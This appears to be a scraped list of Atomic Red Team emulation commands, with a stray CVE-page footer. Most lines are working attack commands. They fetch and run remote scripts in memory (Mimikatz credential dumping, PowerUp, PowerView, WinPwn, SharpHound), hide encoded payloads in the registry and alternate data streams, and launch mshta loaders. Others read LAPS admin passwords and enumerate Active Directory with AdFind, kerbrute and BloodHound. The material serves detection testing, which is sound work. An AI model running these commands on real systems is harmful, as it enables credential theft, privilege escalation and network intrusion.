Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.